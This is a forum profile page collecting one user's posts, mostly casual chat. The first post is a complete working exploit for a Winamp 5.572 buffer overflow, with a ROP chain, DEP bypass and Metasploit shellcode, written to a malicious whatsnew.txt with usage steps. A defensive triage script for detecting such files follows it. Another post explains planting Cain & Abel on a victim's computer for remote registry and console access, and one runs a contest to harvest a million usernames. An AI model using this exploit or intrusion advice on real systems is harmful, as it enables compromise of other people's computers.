
begood

Active Members
  • Posts: 3972
  • Days Won: 22

Everything posted by begood

  1. #!/usr/bin/python
     #
     # Title: Winamp v5.572 local BOF exploit (EIP & SEH DEP Bypass)
     # Author: Rocco Calvi aka TecR0c - http://tecninja.net/blog | http://twitter.com/TecR0c
     # Found BY: Debug
     # Date: June 18th, 2010
     # Platform: Windows XP sp3 En
     # Greetz to: Corelan Security Team
     # http://www.corelan.be:8800/index.php/security/corelan-team-members/
     #
     # Script provided 'as is', without any warranty.
     # Use for educational purposes only.
     # Do not use this code to do anything illegal !
     #
     # Note : you are not allowed to edit/modify this code.
     # If you do, Corelan cannot be held responsible for any damages this may cause.
     # Special thanks to mr_me for making me try harder and lincoln
     # Usage stage 1 : Replace existing whatsnew.txt file with evil whatsnew.txt
     # Usage stage 2 : Launch Application > Help > About Winamp > Version History > BOOM!
     #
     # Python 2 script: str literals are raw bytes, so the file is written byte-for-byte.

     print "|------------------------------------------------------------------|"
     print "| __ __ |"
     print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |"
     print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |"
     print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |"
     print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |"
     print "| |"
     print "| http://www.corelan.be:8800 |"
     print "| security@corelan.be |"
     print "| |"
     print "|-------------------------------------------------[ EIP Hunters ]--|"
     print "[+] Winamp 5.572 (whatnews.txt) DEP Bypass - by TecR0c"

     # http://www.metasploit.com
     # EXITFUNC=process, CMD=calc.exe
     sc = ("\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49"
           "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
           "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
           "\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
           "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a"
           "\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47"
           "\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c"
           "\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a"
           "\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46"
           "\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49\x50\x42\x54\x45"
           "\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c"
           "\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c"
           "\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44"
           "\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c"
           "\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51\x4c\x46"
           "\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50"
           "\x56\x42\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44"
           "\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45"
           "\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42\x4a\x50\x50\x43"
           "\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b"
           "\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43"
           "\x51\x42\x4c\x42\x43\x43\x30\x41\x41")

     version = "Winamp 5.572"

     rop  = "\x41" * 540          # Crash
     rop += "\x09\x12\x0e\x07"    # 0x070E1209 : {POP} # POP EDI # POP ESI # POP EBP # XOR EAX,EAX # POP EBX # RETN [Module : nde.dll]
     rop += "\xee\xff\xff\xc0"    # 0xc0ffffee : Junk
     rop += "\xee\xff\xff\xc0"    # 0xc0ffffee : Junk
     rop += "\xee\xff\xff\xc0"    # 0xc0ffffee : Junk
     rop += "\xee\xff\xff\xc0"    # 0xc0ffffee : Junk
     rop += "\x03\x85\x09\x07"    # 0x07098503 : EAX CALL
     rop += "\xee\xff\xff\xc0"    # 0xc0ffffee : Junk
     rop += "\xee\xff\xff\xc0"    # 0xc0ffffee : Junk
     rop += "\xff\xff\xff\xff"    # 0xffffffff : for EBX
     rop += "\xc5\x01\x5a\x78"    # 0x785A01C5 : # POP EDX # RETN [Module : MSVCR90.dll]
     rop += "\x10\xe0\x10\x07"    # 0x07100e01 : Writeable Address
     rop += "\x46\x17\x5a\x78"    # 0x785A1746 : # ADD EAX,40 # POP EBP # RETN [Module : MSVCR90.dll]
     rop += "\xee\xff\xff\xc0"    # 0xc0ffffee : Junk
     rop += "\x6e\x22\x97\x7c"    # 0x7C97226E : # ADD EAX,100 # POP EBP # RETN
     rop += "\xcf\x22\x80\x7c"    # 0x7C8022CF : dest address in WriteProcessMemory()
     rop += "\xcf\xc9\x0e\x07"    # 0x070EC9CF : # ADD EBX,EAX # XOR AL,AL # RETN [Module : nde.dll]
     rop += "\x5e\x89\x09\x07"    # 0x0709895E : {POP} # POP EAX # POP ESI # RETN [Module : libsndfile.dll]
     rop += "\x13\x22\x80\x7c"    # 0x7C802213 : WriteProcessMemory
     rop += "\xff\xff\xff\xff"    # 0xffffffff : HProcess HANDLE (-1)
     rop += "\x65\x08\x59\x78"    # 0x78590865 : # PUSHAD # RETN [Module : MSVCR90.dll]

     junk = "\x43" * 800

     tecfile = open('whatsnew.txt', 'w')
     tecfile.write(version + rop + sc + junk)
     tecfile.close()
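A file like the one the script above writes is easy to spot on disk once you know its shape: a short version string, a long run of one padding byte, a block of 4-byte little-endian values, then a long filler run. The triage helper below is an added example (not from the post or from Corelan) that finds the padding run, decodes the dwords that follow it and labels the known filler values, leaving the rest as candidate pointers for an analyst to check against the module map of the process that parses the file. The sample buffer is constructed inline from the values in the post's own comments (shellcode omitted); note that the bytes `\x10\xe0\x10\x07` decode to 0x0710E010, not the 0x07100e01 written in the comment, which is exactly the kind of thing decoding the bytes rather than trusting annotations catches.

```python
import struct

# Constructed sample input (not from the page): a buffer with the layout the
# posted script produces, a version string, 540 bytes of 'A', a run of
# 4-byte values, then 'C' filler. The values are the ones the post's bytes
# encode; the encoded shellcode is left out of the sample.
CHAIN_VALUES = [
    0x070E1209, 0xC0FFFFEE, 0xC0FFFFEE, 0xC0FFFFEE, 0xC0FFFFEE,
    0x07098503, 0xC0FFFFEE, 0xC0FFFFEE, 0xFFFFFFFF, 0x785A01C5,
    0x0710E010, 0x785A1746, 0xC0FFFFEE, 0x7C97226E, 0x7C8022CF,
    0x070EC9CF, 0x0709895E, 0x7C802213, 0xFFFFFFFF, 0x78590865,
]


def build_sample():
    chain = b"".join(struct.pack("<I", v) for v in CHAIN_VALUES)
    return b"Winamp 5.572" + b"A" * 540 + chain + b"C" * 800


def first_byte_run(buf, min_len=32):
    """First run of one repeated byte at least min_len long: (offset, length, byte), or None."""
    i = 0
    while i < len(buf):
        j = i
        while j < len(buf) and buf[j] == buf[i]:
            j += 1
        if j - i >= min_len:
            return (i, j - i, buf[i])
        i = j
    return None


# Values with a fixed meaning in this kind of buffer. Anything else that is
# not a repeated byte is reported as a candidate pointer; whether it really
# lands in a loaded module is checked later, against the target process.
KNOWN = {
    0xC0FFFFEE: "junk slot (only there to be popped)",
    0xFFFFFFFF: "0xFFFFFFFF (current-process pseudo-handle, or -1)",
}


def label(value):
    if value in KNOWN:
        return KNOWN[value]
    raw = struct.pack("<I", value)
    if len(set(raw)) == 1:
        return "repeated byte 0x%02x" % raw[0]
    return "candidate pointer"


def dwords_after_padding(buf, max_count=256):
    """Little-endian dwords following the padding run, up to the first filler dword."""
    run = first_byte_run(buf)
    if run is None:
        return []
    start = run[0] + run[1]
    found = []
    for off in range(start, min(len(buf) - 3, start + 4 * max_count), 4):
        value = struct.unpack_from("<I", buf, off)[0]
        what = label(value)
        if what.startswith("repeated byte"):
            break  # reached the trailing filler
        found.append((off, value, what))
    return found


def triage(buf):
    """Summary for a responder: where the padding is and which dwords look like pointers."""
    run = first_byte_run(buf)
    dwords = dwords_after_padding(buf)
    return {
        "padding": run,
        "dwords": dwords,
        "pointers": [v for _, v, what in dwords if what == "candidate pointer"],
    }


if __name__ == "__main__":
    report = triage(build_sample())
    print("padding run (offset, length, byte):", report["padding"])
    for off, value, what in report["dwords"]:
        print("0x%04x  0x%08x  %s" % (off, value, what))
```

Run it against a real suspect file with `triage(open(path, "rb").read())`. On the sample it reports the padding at offset 12, 540 bytes long, followed by 20 dwords of which 11 are candidate pointers; a clean whatsnew.txt has no padding run of that size at all, which is the first thing to look for.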
  2. This video talks about auditing or breaking WPA and WPA2 PSK authentication on wireless networks. David Hoelzer gives a ten minute demonstration explaining all of the steps necessary to demonstrate the insecurity if pre-shared keys are used. You can visit his site here. How to Audit WPA Networks Tutorial
  3. It would be interesting to try.
  4. sad...
  5. Bonus if they're Romanian.
  6. begood

    News-on

    Moromete died alone. I say you should try joining the team. You'll see that at some point you get bored of the blog + you don't get the feedback you want => you'll give up. If you want, I'll talk to andrewboy.
  7. begood

    News-on

    Why don't you write for worldit.info?
  8. After reading the news here and getting a reply from a certain bogdan, I opened this topic. What does the contest consist of? You have to write a program/script, I don't care in what language, just make it fast, that creates a file with the usernames, one per line. Prizes? An orange from begood. If anyone wants to sponsor, contact me by PM or in this topic. Who wins? 2 winners: whoever first posts 1 million users, with no duplicates, and whoever writes the fastest/most efficient script/program. Let's see what you've got!
  9. How are you?
  10. I'm listening to Hard Sun and eating gingerbread.
  11. I've already sold about 50 socks today.
  12. remoulade?
  13. Mom's bringing me a plate full of sausages fried in their own juice; what sauce should I pair them with?
  14. Does it smell good?
  15. What's that, steam? Does it smell good? I get freesias from grandma...
  16. Do you have small, pretty little flowers?
  17. Candy pink with white polka dots.
  18. Grandma brings garden flowers.
  19. June Headline: Google's Go falls out of top 20. Since its release in November 2009 Google's Go was part of the TIOBE top 20. Its initial rise was so phenomenal that it was declared "Programming Language of the Year 2009". After its first, curiosity-driven hype, the language now needs to find its place in the programming language landscape. Some say its multicore support is something that is needed nowadays; others criticize the language for not yet being mature enough to be adopted by professionals. We will see in the next few months what is going to happen. Other interesting changes in June are: Java is back at number 1, changing places with C. Objective-C is still rising (climbing from 10 to 9 in one month), and Powershell has entered the top 20. The TIOBE Programming Community index gives an indication of the popularity of programming languages. The index is updated once a month. The ratings are based on the number of skilled engineers world-wide, courses and third party vendors. The popular search engines Google, MSN, Yahoo!, Wikipedia and YouTube are used to calculate the ratings. Observe that the TIOBE index is not about the best programming language or the language in which most lines of code have been written. The index can be used to check whether your programming skills are still up to date or to make a strategic decision about what programming language should be adopted when starting to build a new software system. The definition of the TIOBE index can be found here. Charts: TIOBE Software: The Coding Standards Company
  20. So. Please don't go off topic. I'm calling out for an umbrella!
  21. The wind took it last night around half past 11, on the way home from the pastry shop. Does anyone have an umbrella to lend? It should be yellow, I want it to match my tights.
  22. And I have to go pick up grandma at the train station; I hope the rain holds off until four..
  23. Well, once you find what's changed, you can write / get Nytro to write you a small program, it's simple in VB6.
  24. You look for / set up a writable share on the victim computer. You install Cain and connect to the computer in question, knowing its IP. You install the "Abel" service and you get access to the registry and the console. From there maybe you'll find a solution for changing the volume. LE: I didn't find a solution for changing the volume, only enable/disable from the registry. It probably isn't even possible, since the settings live in RAM; that's where the changes would have to be made => you'd have to find the location in memory and overwrite it with a patcher... (opinion, I'm not sure). Maybe this helps: compare two different volume values and see what changes / whether it changes.
  25. This is fuckin amusing.. Not a bad idea, although the direction they're heading in seems clear to me.